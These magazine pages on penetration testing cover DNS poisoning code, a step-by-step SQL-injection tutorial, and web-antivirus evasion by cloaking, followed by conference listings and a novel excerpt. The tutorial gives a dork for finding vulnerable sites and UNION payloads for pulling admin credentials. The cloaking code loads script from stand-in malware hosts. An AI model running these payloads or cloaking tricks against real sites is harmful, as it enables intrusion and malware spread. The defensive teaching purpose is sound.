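    return build_header(txid) + encode_qname(name) + struct.pack("!HH", 1, 1)  # A, IN


def build_a_response(txid, name, ip, ttl):
    """Reply carrying one A record; the RR name is a pointer (0xC00C) to the question."""
    rdata = bytes(int(o) for o in ip.split("."))
    rr = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, len(rdata)) + rdata
    return (build_header(txid, qr=1, aa=1, ra=1, ancount=1)
            + encode_qname(name) + struct.pack("!HH", 1, 1) + rr)


class Resolver:
    """Toy caching resolver: the first reply whose ID and question match is believed."""

    def __init__(self, next_id):
        self.next_id, self.pending, self.cache = next_id, None, {}

    def send_query(self, name):
        self.pending = (self.next_id(), name)
        return build_query(self.pending[0], name)

    def receive(self, pkt):
        hdr = parse_header(pkt)
        qname, off = decode_qname(pkt, HEADER.size)
        if hdr["qr"] != 1 or (hdr["id"], qname) != self.pending:
            return False                       # wrong ID or question: dropped silently
        off += 4                               # skip QTYPE and QCLASS
        _, _, _, ttl, rdlen = struct.unpack_from("!HHHIH", pkt, off)
        rdata = pkt[off + 12:off + 12 + rdlen]
        self.cache[qname] = (".".join(str(b) for b in rdata), ttl)
        self.pending = None
        return True


def poison(resolver, name, guesses, fake_ip="203.0.113.66"):
    """Attacker triggers the lookup and races the real answer with forged replies."""
    resolver.send_query(name)
    return any(resolver.receive(build_a_response(g, name, fake_ip, 86400))
               for g in guesses)


def sequential_ids(start):
    """ID generator of a badly written resolver: previous ID plus one."""
    box = [start - 1]

    def nxt():
        box[0] = (box[0] + 1) & 0xFFFF
        return box[0]
    return nxt


def compare_id_sources(trials=200, n_forged=100, seed=7):
    """Poisoning success rate with predictable IDs vs. 16-bit random IDs."""
    rng = random.Random(seed)
    hits_seq = hits_rnd = 0
    for _ in range(trials):
        seq = Resolver(sequential_ids(rng.getrandbits(16)))
        # The attacker has the resolver look up a name they are authoritative for,
        # reads the ID off that query, and forges replies for the next n IDs.
        seen = parse_header(seq.send_query("attacker.example"))["id"]
        seq.pending = None                     # the attacker's own server answered it
        guesses = [(seen + i) & 0xFFFF for i in range(1, n_forged + 1)]
        hits_seq += poison(seq, "www.answer.com", guesses)
        rnd = Resolver(lambda: rng.getrandbits(16))
        hits_rnd += poison(rnd, "www.answer.com",
                           [rng.getrandbits(16) for _ in range(n_forged)])
    return hits_seq / trials, hits_rnd / trials
```

compare_id_sources() returns 1.0 for the sequential resolver (one observed ID is enough to win every race) against a rate on the order of 100/65536 for the random one, which is the whole difference between "difficult" and "easy" in the paragraph above. The toy resolver also shows the check a real one performs: a reply whose ID or question name does not match the outstanding query is discarded, so the forged reply must carry the exact qname as well as the right ID.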

DNS Hijacking

In this kind of attack the attacker tries to "hijack" part of the DNS name space, either by compromising an upstream server or by submitting a fake name server registration change to the Internet registrar.

The key benefit of this attack is that it does not require the direct compromise of any server on the target organization's network. If the attacker's intention, for example, is to deface the corporate web page for the victimco.com domain, the attacker can achieve this by leveraging a DNS hijacking attack to redirect Internet web clients to a new site containing a revised set of web content (Figure 4).

An attacker can compromise a server that holds the records for answer.com, or submit a fake change request to the Internet registrar, and thereby become able to change the records for answer.com. After this step the attacker has hijacked the domain answer.com and can redirect traffic addressed to the legitimate answer.com to fake servers running whatever services are wanted (mail, http, https).

Figure 4. DNS Hijacking

ALEKSANDAR BRATIC
CISO at a respectable financial institution in Serbia, focused on pen testing techniques and methodology, vulnerability assessment, incident handling process and risk mitigation.

BASICS

Web Application Vulnerability: MySQL Attack on Website Database

SQL injection against MySQL (called a "MySQL attack" in this article) is an often used technique for attacking a database through a website. It is done by including portions of SQL statements in a web form entry field or URL parameter, in an attempt to get the website to pass a newly formed rogue SQL command to the database.

SQL stands for Structured Query Language. SQL is used to communicate with a database and is the standard language for relational database management systems. SQL statements are used to perform tasks such as updating data in a database or retrieving data from it. Some common relational database management systems that use SQL are Oracle, Sybase, Microsoft SQL Server, Access and MySQL. Most database systems use SQL, but most also have their own proprietary extensions that are usually only used on their system. The standard SQL commands such as SELECT, INSERT, UPDATE, DELETE, CREATE and DROP can be used to accomplish almost everything one needs to do with a database.

What are tables?

Within a SQL database there are tables which store information. Tables can store any information on a website, ranging from usernames, passwords and addresses to text displayed on a web page, such as a link or page header. Tables have columns in which the records (information) are kept. Each table has a name and each column has a name (Figure 1).

Figure 1. SQL tables view

How does SQL work?

Before we can perform an injection, we must first understand how SQL works.

• When you register a new username and password on a website, the username and password you entered are kept in the site's member table; the username and password are put in their separate columns (Figure 2).
• When you log in with the username and password you registered, the login page looks for a row in the member table that has the same username and password that you supplied.
• The login form takes the conditions that you supply and searches the member table for any rows that satisfy those conditions.
• If a row exists that has both the same username and password, you are allowed into your account.
• If no row is found, the login page will tell you that the account you specified does not exist, or that your username or password is wrong.
• SQL can also display information on a website. If a site has a news section, there may be an SQL table that, for example, holds all of the article names. More often than not, articles on a website are identified by a number. When you click on a link to an article, you can usually see the number of the article you clicked on by looking at the URL of the page you are on.
• When you click a link like www.abcd.com/love.php?id=10, the link tells the site to look in the table that stores the articles for the article whose id is 10.
• It is important to realize that what is typed after the "=" sign in the URL becomes part of an SQL command (Figure 3).

Figure 2. User registration

Figure 3. Some SQL Commands

The information schema is one of several methods MySQL provides for obtaining metadata.

• INFORMATION_SCHEMA holds the names of every table and column on the server.
• Every MySQL server (5.0 and later) has an INFORMATION_SCHEMA database, and its name never changes.
• The table in INFORMATION_SCHEMA that holds the names of all the other tables is called INFORMATION_SCHEMA.TABLES.
• The column that holds the table names in INFORMATION_SCHEMA.TABLES is called table_name.
• The table in INFORMATION_SCHEMA that holds the names of all the columns is called INFORMATION_SCHEMA.COLUMNS.
• The column that holds the column names in INFORMATION_SCHEMA.COLUMNS is called column_name (Figure 4).

MySQL Attack in a MySQL Database

Checking for vulnerability

To find vulnerable websites, type the following in Google or any search engine: inurl:.php?id= or inurl:.php?product_id= (Figure 5).

Step 1
Suppose you got a site like http://www.abcd.com/love.php?id=10.

Step 2
Check whether it is vulnerable. Simply add ' at the end of the URL, so the resulting URL is www.abcd.com/love.php?id=10'. If the site is not vulnerable, the page loads normally. If it is vulnerable, it will show an error like:


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Even if only the content of the page changes, the site may still be vulnerable, so observe the page closely.

Step 3
Find the number of columns. For this, use the ORDER BY clause:

www.abcd.com/love.php?id=10 order by 1-- (no error)

So let's increase it to 2:

www.abcd.com/love.php?id=10 order by 2-- (no error)

Keep incrementing the ORDER BY value by 1 until it gives an error. In this case we got the error at www.abcd.com/love.php?id=10 order by 4--, which means there are three columns.

Step 4
Find which column is rendered on the page, so that data of interest can be placed in it. For this we use UNION. We have 3 columns:

www.abcd.com/love.php?id=-10 union all select 1,2,3--

Note
Note the negative value after id=. No article has id -10, so the original SELECT returns no row and the page renders only the row supplied by our UNION, instead of the real article content such as pictures.

Look at the page and you will see one or more of the column numbers displayed. There may be more than one; any of them will do. In this case we got 2.

Step 5
Check the database version using @@version. Since column 2 is displayed, our query is:

www.abcd.com/love.php?id=-10 union all select 1,@@version,3--

Step 6
Get the table names from information_schema (see the information schema section above):

www.abcd.com/love.php?id=-10 union all select 1,table_name,3 from information_schema.tables--

This query will display every table name in the database. Sometimes there is not enough room on the page to display all of them and only one table name is shown. In that case we use LIMIT 0,1:

www.abcd.com/love.php?id=-10 union all select 1,table_name,3 from information_schema.tables limit 0,1--

Figure 4. Information schema

Figure 5. Finding vulnerable websites


Keep incrementing the LIMIT offset by 1 (limit 1,1, limit 2,1, and so on) until we get the desired table name. If you had to use unhex(hex()) while finding the version, you will have to use unhex(hex(table_name)) here too.

Suppose in our case the desired table name is admin.

Step 7
Get all the column names of the table we found in step 6. The query for the column names looks similar:

www.abcd.com/love.php?id=-10 union all select 1,column_name,3 from information_schema.columns where table_name=char(97,100,109,105,110)--

Remember to convert the table name into its ASCII codes: 97,100,109,105,110 is "admin". This avoids quote characters, which the application may escape. Suppose we got the columns id, username and password.

Step 8
Extract the data from the table. Now we get the data of the chosen columns from the table. Our query for the username is:

www.abcd.com/love.php?id=-10 union all select 1,username,3 from admin--

This gives the admin username. Our query for the password is:

www.abcd.com/love.php?id=-10 union all select 1,password,3 from admin--

This gives the password in plain form or, often, as an MD5 or SHA-1 hash such as 819bed5b34b02ccb68ab69ab2055b. A hash cannot be decrypted; it has to be cracked, by looking it up in online hash databases or brute-forcing it.

To combine the data of all columns in one query we use the concat function:

www.abcd.com/love.php?id=-10 union all select 1,concat(id,0x3a,username,0x3a,password),3 from admin--
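The procedure of steps 2 to 8, as an added example that is not part of the original article: it runs the same ORDER BY probing and UNION extraction against an in-memory SQLite database standing in for the MySQL backend of love.php, next to the parameterized query the countermeasures below call for. The schema, the article id and the MD5 hash are constructed for the example; where SQLite differs from MySQL (sqlite_master instead of information_schema.tables, || instead of concat()) the code says so.

```python
"""Added example (not the article's code): UNION-based extraction from steps 2-8
against an in-memory SQLite stand-in for love.php's MySQL backend, beside the
parameterized query that stops it. Schema, ids and the hash are constructed."""
import sqlite3


def make_db():
    """Constructed sample schema: the articles table love.php reads, plus an admin table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO articles VALUES (10, 'Love', 'An article about love.');
        -- unsalted MD5 of 'password', the kind of hash step 8 turns up
        INSERT INTO admin VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def vulnerable_article(conn, id_param):
    """What love.php?id=... does: the parameter is pasted into the SQL text.
    Returns (rows, None) on success or (None, error_message) on a database error."""
    sql = "SELECT id, title, body FROM articles WHERE id=" + id_param
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.OperationalError as exc:
        return None, str(exc)


def safe_article(conn, id_param):
    """Countermeasure: validate the type and bind the value; the SQL text is constant."""
    try:
        article_id = int(id_param)
    except ValueError:
        return None, "invalid id"
    rows = conn.execute("SELECT id, title, body FROM articles WHERE id=?",
                        (article_id,)).fetchall()
    return rows, None


def count_columns(conn, max_cols=20):
    """Step 3: raise ORDER BY n until the database complains; the last n that
    worked is the number of columns in the original SELECT."""
    for n in range(1, max_cols + 1):
        _, err = vulnerable_article(conn, "10 ORDER BY %d--" % n)
        if err is not None:
            return n - 1
    return None


def union_extract(conn, ncols, expr, from_clause, shown_col=2):
    """Steps 4-8: a negative id empties the real result set, so the page shows only
    the UNION row; `expr` is placed in the column the page renders (here column 2)."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[shown_col - 1] = expr
    payload = "-10 UNION ALL SELECT %s FROM %s--" % (", ".join(cols), from_clause)
    rows, err = vulnerable_article(conn, payload)
    if err is not None:
        raise RuntimeError(err)
    return [row[shown_col - 1] for row in rows]


def run_attack(conn):
    """The whole procedure against the vulnerable handler."""
    ncols = count_columns(conn)
    # MySQL: information_schema.tables / table_name; SQLite keeps that in sqlite_master.
    tables = union_extract(conn, ncols, "name", "sqlite_master WHERE type='table'")
    # MySQL: concat(id,0x3a,username,0x3a,password); SQLite concatenates with ||.
    creds = union_extract(conn, ncols, "username || ':' || password", "admin")
    return ncols, sorted(tables), creds
```

run_attack(make_db()) returns (3, ['admin', 'articles'], ['admin:5f4dcc3b5aa765d61d8327deb882cf99']), i.e. the column count from step 3, the table list from step 6 and the concatenated credentials from step 8. The same payloads handed to safe_article() never reach the database: the only thing the parameter can become is an integer, and the query text is fixed.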

Countermeasures against MySQL Attacks

1. Install GreenSQL, which acts as a database firewall.
2. Do not use the MySQL root user to access the database from the application.
3. Revoke the FILE privilege from the MySQL user used by your applications.
4. Review the application code, and replace string-built queries with parameterized (prepared) statements.


MR. OOPPSS
Cyber Security Analyst, i3indya Technologies


WEB APP


Bypassing Web Antiviruses

At the beginning of April 2010 I tested systems for searching for viruses at web sites [1]. In that research I examined different systems for searching for viruses at web sites, both standalone and built into search engines; these systems can be called web antiviruses. Later I presented my test results at the UISG and ISACA Kiev Chapter #6 conference [2].

I examined the following web antiviruses: Web Virus Detection System, Google, Yahoo, Yandex, Norton Safe Web, McAfee SiteAdvisor and StopBadware. Every web antivirus can face attempts by malware to hide from it (so the malware is left undetected and continues to infect visitors of web sites). In this article I describe methods of bypassing web antiviruses, which the developers of such systems need to take into account to prevent malware from hiding from them.

Bypassing systems for searching for viruses at web sites

In May 2010 I published a post on The Web Security Mailing List [3] about bypassing systems for searching for viruses at web sites. This concerns all such systems, including search engines with built-in antiviruses, which have no countermeasures against it.

Bypassing these systems is possible using cloaking, which has been known since the 90s and is used to hide content from search engine bots for SEO purposes. The User-Agent header is analyzed: if it belongs to a search engine, the malicious code is not served; if it belongs to a browser, it is. So the same cloaking used for SEO can be used for spreading malware and hiding it from systems for searching for viruses at web sites, particularly from search engines with built-in antivirus systems, because they use the search engines' bots with known user agents.

I have seen the cloaking method used in malicious scripts many times during my research since 2008. In particular I saw checking of the Referer header (and the same approach can be used for User-Agent). This method of protecting malicious code from virus-searching systems creates a serious challenge for these systems.

Antivirus companies and other security researchers also sometimes find cases of cloaking being used against search engines with built-in antiviruses. Example: in May 2010 many web sites on shared hosting at DreamHost and other hosting providers were hacked and infected with malicious code, and the code distributing the malware used cloaking to hide itself from the built-in antiviruses of the Google and Yahoo search engines.

Effective use of cloaking against web antiviruses

At the end of August 2011 I found that Google had started using User-Agent spoofing for its bots. This can be connected with the desire to improve its system for searching for viruses at web sites, i.e. using cloaking (UA spoofing is a form of it) to decloak viruses at web sites.

But it uses spoofing ineffectively, and with considered use of cloaking, malware can effectively hide from Google's bots and from the bots of any search engine, including those systems which have built-in antiviruses. Currently these are Google, Yahoo, Bing and Yandex.

Where earlier Google's bot named itself in the User-Agent header as "Googlebot" (e.g. "Googlebot/2.1"), I found that it sometimes named itself "MOZILLA 5.0". On one hand this can help to decloak hidden malware at sites, but on the other hand it is not enough, because advanced malware can check not only the User-Agent but also the IP address, and do a reverse DNS lookup.

In particular, for this bot the IP address was 66.249.66.102 and the reverse-resolved name was crawl-66-249-66-102.googlebot.com, from which it can be determined that it is exactly Googlebot. And even if it were given another domain name, the WHOIS records would show that this IP belongs to Google, so malware can use this information to build an IP list (or query WHOIS in real time) by which it hides itself from these bots. So effective cloaking works on three parameters simultaneously: User-Agent, IP and DNS. These are well known things in the world of cloaking, which security vendors should know about.

Conclusion

In this article I have described different methods which allow web antiviruses to be bypassed, and which web antiviruses should take into account in opposing malware.

For effective cloaking at web sites, malware can analyze User-Agent, IP and DNS. So developers of web antiviruses, including search engines with built-in antiviruses, need to take this into account to fight malware effectively. Because in this game of masking only a well hidden web antivirus can reveal hidden malware.
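The three-parameter cloaking described above, and the check a web antivirus can run against it, as an added example that is not part of the article: an infected site decides on User-Agent, IP range and reverse DNS together, and a scanner catches it by comparing what its own identities receive with what a plain browser from an unaffiliated address receives. The crawler UA tokens, the /24 around the address quoted in the article, the reverse-DNS table (standing in for socket.gethostbyaddr) and both page bodies are constructed for the example; nothing here makes a network request.

```python
"""Added example (not from the article): cloaking on User-Agent, IP and reverse DNS,
and the diff-based decloaking check a scanner can run. All tables are constructed."""
import ipaddress

CRAWLER_UA_TOKENS = ("googlebot", "yandexbot", "bingbot", "yahoo! slurp")
# Constructed: a /24 around the crawler address quoted in the article.
CRAWLER_NETS = [ipaddress.ip_network("66.249.66.0/24")]
CRAWLER_RDNS_SUFFIXES = (".googlebot.com", ".yandex.com", ".search.msn.com",
                         ".crawl.yahoo.net")
# Constructed reverse-DNS table standing in for a real PTR lookup.
RDNS_TABLE = {"66.249.66.102": "crawl-66-249-66-102.googlebot.com"}

CLEAN_PAGE = "<html><body>Welcome to example.org</body></html>"
INFECTED_PAGE = CLEAN_PAGE.replace(
    "</body>", '<script src="http://malware.example/x.js"></script></body>')


def reverse_lookup(ip):
    """Stand-in for socket.gethostbyaddr(); returns the PTR name or None."""
    return RDNS_TABLE.get(ip)


def looks_like_crawler(user_agent, ip, rdns=reverse_lookup):
    """The malware's decision: any one of the three signals marks a scanner.
    A spoofed User-Agent alone therefore changes nothing for a request that
    still comes from a crawler address or resolves to a crawler name."""
    if any(tok in user_agent.lower() for tok in CRAWLER_UA_TOKENS):
        return True
    addr = ipaddress.ip_address(ip)
    if any(addr in net for net in CRAWLER_NETS):
        return True
    name = rdns(ip)
    return bool(name) and name.lower().endswith(CRAWLER_RDNS_SUFFIXES)


def cloaked_server(user_agent, ip):
    """An infected site: scanners get the clean page, everybody else the payload."""
    return CLEAN_PAGE if looks_like_crawler(user_agent, ip) else INFECTED_PAGE


def detect_cloaking(fetch, baseline, probes):
    """Scanner side. `baseline` is (user_agent, ip) of a plain browser from an
    address unrelated to the scanner; `probes` are (label, user_agent, ip) for the
    scanner's own identities. Returns the labels that were served something other
    than what the baseline saw, i.e. the identities the site is cloaking against."""
    reference = fetch(*baseline)
    return sorted(label for label, ua, ip in probes if fetch(ua, ip) != reference)
```

With GOOGLE_IP = "66.249.66.102", cloaked_server("Mozilla/5.0", GOOGLE_IP) still returns the clean page, which is the article's point about Google's spoofing being ineffective; only a fetch from an address outside the crawler ranges with no crawler reverse name receives the payload. detect_cloaking() reports exactly which of the scanner's identities are being served a different page than the baseline browser.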

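The "well hidden web antivirus" the conclusion calls for must, at a minimum, compare what a site serves to an identifiable crawler with what it serves to an ordinary browser. The following Python program is an added example, not code from the article or from any of the scanners it names: a cloaking detector that fetches the same URL under a crawler User-Agent and under a browser User-Agent, extracts the active content from each response (external script and iframe sources, plus a digest of every inline script) and reports anything the browser receives that the crawler does not. The `fetch` callable, the profile names, the sample pages and the `constructed_cloaking_site` stand-in are all assumptions made so the example runs offline. A real deployment would also issue the browser-profile request from an address that neither reverse DNS nor WHOIS ties to the scanner, since, as the article explains, the User-Agent is only one of the three parameters that malware checks.

```python
"""Cloaking detector (added example): compare the page a site serves to a
crawler profile against the page it serves to a browser profile and flag
active content that only the browser receives."""
import hashlib
from html.parser import HTMLParser
from typing import Callable, Dict, List, Set


class ActiveContentExtractor(HTMLParser):
    """Collects external <script src> and <iframe src> URLs plus a short
    SHA-256 digest of every inline <script> body."""

    def __init__(self) -> None:
        super().__init__()
        self.items: Set[str] = set()
        self._in_inline_script = False
        self._inline_chunks: List[str] = []

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        if tag == "script":
            if attr.get("src"):
                self.items.add("script:" + attr["src"])
            else:
                self._in_inline_script = True
                self._inline_chunks = []
        elif tag == "iframe" and attr.get("src"):
            self.items.add("iframe:" + attr["src"])

    def handle_data(self, data):
        if self._in_inline_script:
            self._inline_chunks.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline_script:
            self._in_inline_script = False
            body = "".join(self._inline_chunks).strip()
            if body:
                digest = hashlib.sha256(body.encode("utf-8")).hexdigest()[:16]
                self.items.add("inline:" + digest)


def active_content(html: str) -> Set[str]:
    """Return the set of active-content identifiers found in an HTML document."""
    parser = ActiveContentExtractor()
    parser.feed(html)
    parser.close()
    return parser.items


# Assumed request profiles: one that announces itself as a crawler and one
# that looks like an ordinary browser of the period.
PROFILES = {
    "googlebot": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "browser": "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
}


def detect_cloaking(fetch: Callable[[str], str],
                    profiles: Dict[str, str] = PROFILES,
                    reference: str = "browser") -> Dict[str, Set[str]]:
    """Fetch the page once per profile (fetch takes a User-Agent string and
    returns the response body) and report, per crawler profile, the active
    content the reference browser profile received but the crawler did not.
    An empty dict means no User-Agent based cloaking was observed."""
    views = {name: active_content(fetch(ua)) for name, ua in profiles.items()}
    reference_view = views[reference]
    hidden: Dict[str, Set[str]] = {}
    for name, view in views.items():
        if name == reference:
            continue
        only_browser_sees = reference_view - view
        if only_browser_sees:
            hidden[name] = only_browser_sees
    return hidden


# Constructed stand-in for a compromised site, used so the example runs
# offline: crawler User-Agents get the clean page, everyone else gets the
# same page with a 1x1 iframe injected before </body>.
CLEAN_PAGE = """<html><head><script src="/js/app.js"></script></head>
<body><h1>Welcome</h1><script>var counter = 1;</script></body></html>"""
INJECTED_IFRAME = ('<iframe src="http://payload.example/frame.html" '
                   'width="1" height="1"></iframe>')


def constructed_cloaking_site(user_agent: str) -> str:
    """Behaves like the User-Agent cloaking described in the article."""
    if "Googlebot" in user_agent:
        return CLEAN_PAGE
    return CLEAN_PAGE.replace("</body>", INJECTED_IFRAME + "</body>")


if __name__ == "__main__":
    for crawler, hidden in detect_cloaking(constructed_cloaking_site).items():
        print(f"cloaking against {crawler}: browser-only content {sorted(hidden)}")
```

Comparing sets of active-content identifiers rather than whole response bodies keeps legitimate per-request differences (timestamps, session ids, rotating advertisements) from being reported; inline scripts that embed a per-request nonce will still differ between fetches and show up as a browser-only digest, so such findings should be reviewed rather than treated as proof of cloaking on their own.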

EUGENE DOKUKIN AKA MUSTLIVE

Eugene Dokukin has over 17 years of experience in IT and programming. He is also a specialist in web development and web security. His prime areas of work are programming, web development and web security. He now works as a private auditor of websites and web applications. Email: [email protected]


CLOSE-UP

June 3 – 6, 2012, Techno Security 2012 & Mobile Forensics 2012 VIP Invitation for PenTest Magazine readers [FREE VIP registration]

data: June 3 – 6, 2012

title: Techno Security & Mobile Forensic (two events)

organizer: TheTrainingCo.

keywords: mobile devices forensic, digital investigations, multiple trainings

place: Myrtle Beach, SC, USA

description: This will be the 14th year for Techno Security and the 5th year for Mobile Forensics. Frequent attendees are some of the top practitioners in the world in the fields of Information Security, eDiscovery, Mobile Forensics, Digital Forensics and Technical Business Continuity Planning. Last year, there were over 1,000 people registered. Techno Security 2012 will include several sessions as well as pre-conference and post-conference events. You may choose between courses concentrated inter alia on Smart Devices, issues of Flasher Box and JTAG, Python Scripting with UFED Physical Analyzer and other trainings addressed to both advanced and inexperienced users. For the full range you must visit the website.

official page: www.techsec.com

if from pentest: free VIP registration [email protected]

Conferences in 2012

Programmer is a constantly undereducated person. Being up to date with the latest trends and solutions often decides if you are seen as a top-shelf coder. We are presenting conferences where all the new trends are mixed and exchanged between groups and individuals in vivid and revitalizing atmosphere. And where you can shine with your knowledge.

Figure 1. Golf tournament at this golf course is an additional option


June 27 & September & December, The Amphion Forum 2012. Recommended!

data: June 27 and September 2012 and December 2012

title: The Amphion Forum

organizers: Codenomicon, Mocana

key-words: interdisciplinary, electronics, smartphone, defense electronics, aviation, app

place: Washington DC; San Francisco CA; Seoul, South Korea

description: One of the biggest conferences every year. It’s the only event focused on the security of the billions of devices that already outnumber PCs on the network by 5 to 1. You’ll learn about security for mobiles and tablets and also security for smart grid, medical devices and industrial automation. Amphion is exclusive, interdisciplinary and intense. Meet the crypto architects and the device business leaders making the Internet of Things a reality. And find out what’s yet to come, quarters before your competition. The Amphion Forum brings together thought-leaders from academia, business, government and tech to discuss the threats – and opportunities – presented by the unprecedented proliferation of connected devices.

official page: www.amphionforum.com

July 22 – 25, SharePoint Technology Conference, in Boston

data: July 22 – 25, 2012

place: Boston, Canada

title: SharePoint Technology Conference

organizer: BZ Magazine

keywords: SharePoint environment

description: It is the world’s premier independent event for Microsoft Office SharePoint. The format includes 90+ technical classes, workshops and breakout classes with content geared to IT professionals, business managers and developers. It features top Microsoft MVPs, dozens of expert MS speakers and solutions from 50+ exhibitors

official page: www.sptechcon.com/boston2012

Figure 2. The Westin Copley Place, place of training


ISAF IT Security 2012 September 20th – 23rd

data: September 20 – 23, 2012

title: ISAF IT Security 2012

organizer: ISAF

key-words: not advanced users

place: Istanbul, Turkey

description: Addressed to those who want to increase their share in the local market, as there are some local brands involved. The conferences on general security, safety & health and smart housing are being held at the same time. In 2012 the IT Security Exhibition covers the themes of Information Security, Data Security and Network Security, which are today the most important part of security.

official page: www.isaffuari.com

26-28 September 2012, Russia’s No. 1 IT & Security Event

data: September 26 – 28, 2012

title: Russia’s No. 1 IT & Security Event

organizer: infosecurity

key-words: cloud, mobile, Free Software for Enterprises, infosecurity, ICT, local market

place: Crocus Expo, Moscow, Russia

description: The VIII International InfoSecurity Russia, StorageExpo & Documation Show 2011 targets users’ needs, educational content being the main concern of the event organizers. The show presents the experience of the biggest Russian and global suppliers of information security products and solutions.

official page: www.eng.infosecurityrussia.ru

Figure 3. Last year conference

Figure 4. Crocus Expo in Moscow


26-29 September, nullcon [30% discount on conference pass for up to two persons]. Recommended!

data: June 3 – 6, 2012

title: NULLCON, The International Security Conference

organizer: Null – The Open Security Community

key-words: information security

place: Delhi, India

description: Exposure to the latest in information security, new attack vectors, solutions to complex security issues. Experience practical scenarios, thought provoking ideas and research from the luminaries in the global IT security industry. Benefit from the unique appeal of global flagship event which attracts national and international visitors, thus ensuring large numbers of international contacts and collaboration worldwide. Exclusive null Job fair enables organizations and professionals to find the right fit for each other.

official page: www.nullcon.net

if from pentest: 30% discount on conference pass, up to two persons: [email protected]

27th-28th September, 2012, Houston, Texas, Cyber Security for Chemical Industry. Interesting

data: September 27 – 28, 2012

title: Cyber Security for Chemical Industry

organizer: Qatalyst Global

key-words: chemical industry

place: Houston, Texas

description: The Cyber Security for Chemical Industry Europe will bring together leading c-level practitioners and senior IT Security Managers from across Europe to discuss how you can ensure that your business is not vulnerable to attack. Attend this event to benefit from unrivalled benchmarking and networking opportunities with other peers in the industry. Hear first-hand from other CIOs and CISOs how they are preventing against cyber threats and discover the latest research and development and how it will impact your business in the coming months.

official page: www.cybersecurity-chemicals.com

Figure 4. Hotel Leela Kempinski, Delhi


October, 1-3, SecTor – Canada’s premier IT Security Education Conference

data: October 1 – 3, 2012

title: SecTor – Security Education Conference

organizer: TASK

key-words: cloud security, forensics, governance, risks, compliance

place: Toronto, ON, Canada

description: An annual event where IT professionals from throughout Canada can learn from and network with the world’s most innovative, intellectual, exciting and entertaining security professionals. SecTor is IT Security Training at its best – plan to join us October 1-3, 2012 at the Metro Toronto Convention Center.

official page: www.sector.ca

if from pentest: free users: 10% off registration; subscribers: 10% off registration + free registration to ‘PenTest-Expo 2012’. Please write to: [email protected]

October 22-24, 2012, San Francisco, WPDevCon. Recommended!

data: October 22 – 24, 2012

title: The Windows Phone Developer Conference

organizer: BZ Media

key-words: windows phone, tools, integration with cloud

place: San Francisco, CA

description: The first WPDevCon: Windows Phone Developer Conference is the independent conference for software developers, marketers and entrepreneurs building applications for Windows Phone-powered smartphones. Windows Phone is poised for take off with Microsoft putting the engines on full power in 2012. Projected attendance is 500+ from across the globe. Exhibits admission is free! Windows Phone is about to take off. Microsoft is putting the engines on full power – and this is one flight you won’t want to miss. With dozens of technical classes, workshops and keynotes 100% focused on building and selling Windows Phone apps, this may be one of the most important educational and networking opportunities in 2012.

official page: www.wpdevcon.net

discount: Receive a $100 discount off the prevailing rate for the 3-day pass by inserting the code MEDIASPONSOR when prompted on the eRegistration page linked from www.wpdevcon.net

Figure 5. Conference room at recent SecTor


CYBER STYLETTO

Stokes turned right, down a cramped aisle into the coach section of Air Asia charter flight 711, a non-stop to Macau packed with people eager to try their luck at the MGM. Yvonne smirked as he shook his head over the seat he’d been assigned, in the middle of the last row. He wouldn’t even be able to lean back during the ten-hour flight with the bulkhead behind him. He turned to make sure she was following him, and saw she was not.

“Where are you going?” he asked.

She smiled. “First class, of course.”

Buck, Woody and the others all headed left, holding in their laughter. “Them too?” Stokes said.

“We always fly up front.”

He took the crumpled boarding pass and waved it at her. “Then what am I doing with this?”

“Rohan, darling. I tried. But by the time I knew you were coming it was too late to get you a first class seat,” she said.

He turned to go back to the gulag of the last row, then stopped.

“Wait a minute,” he said. “When I showed up, you hadn’t even made your plans for this trip. You just did this to spite me.”

The queue of passengers loading up behind Stokes as he blocked the aisle began to get restless. An old woman pushed her carryon into his leg. She blurted something in Chinese. He didn’t know the words, but Yvonne could see he understood her meaning as he dropped his head and started walking back. In Macao the group had to wait almost a half hour for Stokes to disembark, since literally everyone else on board was in front of him.

Yvonne had considered leaving for the hotel without him, but he’d only track her down through her cochlear implant, and she was getting tired of that. He came up the tunnel looking as though he’d been flying in a laundry hamper – his jacket and shirt were wrinkled, and one pant leg had risen high enough to show a stretch of bare shin above his sock, and was held in place by static cling.

Cyber Styletto

7 a.m., Sunday, San Francisco International Airport



“You get into a fight back there, Stokes?” Colin said.

“I think I was stuck between two sumo wrestlers,” he said.

Maybe the rough treatment had been too much. Yvonne hadn’t anticipated his seatmates being Woody’s size. “Sorry,” she said. “I got a little carried away with the joke.”

“I had it coming,” Stokes said. “I put you on the spot back in San Fran.”

“And a few other places,” she said.

A stretch limo met them outside the terminal to take them to the MGM. “Pansy Po,” Yvonne explained as they got in. “We’re old friends. I told her we were coming.”

“Nice to have friends like that,” Nigel said.

“Listen,” Yvonne said. “Pansy will show us a great time tonight while we get ready for the job. But you need to promise not to win too much at the tables. It kind of makes her mad if she thinks she’s paying at both ends. Just think of it as another way to handle the bill.”

Silk smiled at her. “You don’t have to worry,” he said.

“Why not?”

“Three decks, shuffled every other hand,” Buck said. “Silk had to stop counting cards after most of the houses changed their strategy. He was one of the best blackjack counters in the business before he joined our team.”

“Father taught me in Manila,” Silk said. “I clean up there too.”

“Now he just bets the animals,” Woody said.

Stokes looked up. “Animals?”

“Horses, dogs… the occasional rooster.”

“That’s where big money is anyway,” Silk said. “Better odds.”

“Your father was Doug Boland, wasn’t he?” Stokes asked.

“Yes. You know him?”

“Knew him in Iraq during Desert Storm,” Stokes said. “Tank man. One of the few to fight there and in Nam. Toughest son of a bitch I ever met.”

“Met Lu at Doug’s funeral,” Buck said. “We brought him on a couple of years after, when I saw him win a martial arts tournament in Thailand.”

“Sorry to hear that your dad passed away,” Stokes said. “He was the last of a breed, if you ask me.”

